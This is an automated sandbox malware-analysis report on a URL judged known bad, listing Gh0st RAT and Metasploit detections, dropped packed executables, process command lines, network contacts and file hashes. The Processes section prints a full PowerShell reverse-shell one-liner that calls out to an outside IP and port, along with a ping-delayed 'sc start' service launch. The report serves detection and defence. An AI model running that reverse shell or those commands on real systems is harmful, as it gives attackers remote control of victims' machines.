Analysis Overview
Threat Level: Known bad
The file http://193.42.40.120:65532/ was found to be: Known bad.
Malicious Activity Summary
Gh0strat
MetaSploit
Gh0st RAT payload
Downloads MZ/PE file
Blocklisted process makes network request
VMProtect packed file
Executes dropped EXE
Launches sc.exe
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies registry class
NTFS ADS
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-05 17:11
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-05 17:11
Reported
2024-04-05 17:14
Platform
win10v2004-20240226-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gh0strat
MetaSploit
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\a.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\ew.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.exe | N/A |
| N/A | N/A | C:\Program Files\Common Files\en-US\avservice.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.vmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\iox.vmp.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\jp.vmp1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\lcx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\mm.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\s5.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\server.exe | N/A |
VMProtect packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 812889.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 228742.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 49884.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 545744.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 89513.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 871022.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 329724.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 4555.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 147682.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 371741.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 619887.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://193.42.40.120:65532/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff967b846f8,0x7ff967b84708,0x7ff967b84718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2196 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5148 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5908 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5328 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5808 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6192 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6232 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1792 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6224 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5952 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6228 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3496 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5552 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5452 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3524 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6264 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\2.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('198.13.46.131',12888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
C:\Users\Admin\Downloads\a.exe
"C:\Users\Admin\Downloads\a.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && ping 127.0.0.1 && ping 127.0.0.1 && sc start NetworkNetman
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\Downloads\ew.exe
"C:\Users\Admin\Downloads\ew.exe"
C:\Users\Admin\Downloads\iox.exe
"C:\Users\Admin\Downloads\iox.exe"
C:\Windows\SysWOW64\sc.exe
sc start NetworkNetman
C:\Program Files\Common Files\en-US\avservice.exe
"C:\Program Files\Common Files\en-US\avservice.exe"
C:\Users\Admin\Downloads\iox.vmp.exe
"C:\Users\Admin\Downloads\iox.vmp.exe"
C:\Users\Admin\Downloads\iox.vmp.exe
"C:\Users\Admin\Downloads\iox.vmp.exe"
C:\Users\Admin\Downloads\jp.vmp1.exe
"C:\Users\Admin\Downloads\jp.vmp1.exe"
C:\Users\Admin\Downloads\lcx.exe
"C:\Users\Admin\Downloads\lcx.exe"
C:\Users\Admin\Downloads\mm.exe
"C:\Users\Admin\Downloads\mm.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,17469672150311113479,16846612080174723240,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6484 /prefetch:2
C:\Users\Admin\Downloads\s5.exe
"C:\Users\Admin\Downloads\s5.exe"
C:\Users\Admin\Downloads\server.exe
"C:\Users\Admin\Downloads\server.exe"
C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe" "C:\Users\Admin\Downloads\powershell-reverse-shell.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 211.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 120.40.42.193.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| TW | 193.42.40.120:65532 | 193.42.40.120 | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.rejetto.com | udp |
| N/A | 224.0.0.251:5353 | N/A | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| JP | 198.13.46.131:12888 | N/A | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | winxxoo.jumpxxoo.com | udp |
| TW | 193.42.40.120:443 | winxxoo.jumpxxoo.com | tcp |
| JP | 198.13.46.131:8989 | N/A | tcp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| TW | 193.42.40.120:65532 | winxxoo.jumpxxoo.com | tcp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0764f5481d3c05f5d391a36463484b49 |
| SHA1 | 2c96194f04e768ac9d7134bc242808e4d8aeb149 |
| SHA256 | cc773d1928f4a87e10944d153c23a7b20222b6795c9a0a09b81a94c1bd026ac3 |
| SHA512 | a39e4cb7064fdd7393ffe7bb3a5e672b1bdc14d878cac1c5c9ceb97787454c5a4e7f9ae0020c6d524920caf7eadc9d49e10bee8799d73ee4e8febe7e51e22224 |
\??\pipe\LOCAL\crashpad_2924_NHNSGZGRXIQCYKSO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e494d16e4b331d7fc483b3ae3b2e0973 |
| SHA1 | d13ca61b6404902b716f7b02f0070dec7f36edbf |
| SHA256 | a43f82254638f7e05d1fea29e83545642f163a7a852f567fb2e94f0634347165 |
| SHA512 | 016b0ed886b33d010c84ca080d74fa343da110db696655c94b71a4cb8eb8284748dd83e06d0891a6e1e859832b0f1d07748b11d4d1a4576bbe1bee359e218737 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 9ecacaa0f8706fc051ed66f044f9045f |
| SHA1 | c92ebcb76c57476c8083cd9cb51c20407c3777d3 |
| SHA256 | 728832f2c4a6680d5e0426b8096fb16e71cd5c1a69d6a2c27d6bdba8918fd848 |
| SHA512 | fb389195f0771fb307698c39af780f12fb56a207afcbcdf1c2b5a6639d61f2b44471c187278e6031f6afff4d2c3c66690beef76767e4ae6f4f79a431827c112a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
